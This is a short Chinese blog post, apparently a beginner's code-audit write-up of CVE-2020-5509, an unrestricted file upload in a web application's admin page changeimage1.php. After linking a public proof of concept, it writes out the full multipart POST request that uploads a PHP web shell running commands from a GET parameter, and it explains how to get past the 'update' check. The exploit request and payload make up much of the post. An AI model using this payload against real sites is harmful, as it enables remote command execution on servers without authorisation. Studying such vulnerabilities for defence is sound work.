m4tirhacker@home:~$

CVE-2020-5509漏洞分析

前几天在Gayhub上看到了这个漏洞的exp,是国外小哥写的! Github原址:https://github.com/FULLSHADE/CVE-2020-5509-POC

前言

小弟第一次接触代码审计,故写下此文!

漏洞原理十分简单.

漏洞分析

首先祭出神器 Seay源代码审计工具对网站源码进行自动审计!

可以看到他这里有很多未过滤的文件上传,但是却是在后台,漏洞危害性小了很多!

这里要验证update,所以我们直接让update=“”

然后post http://website/admin/changeimage1.php

我们让协议头为

Content-Type: multipart/form-data; boundary="I am lonely"

上传的File数据为[其中–I am lonely是分割的,只需要在协议头中让他们保持一致即可!]:

--I am lonely
Content-Disposition: form-data; name="img1"; filename="test.php"
Content-Type: image/jpeg

<?php system($_GET["cmd"]); ?>
--I am lonely
Content-Disposition: form-data; name="update"

--I am lonely

END!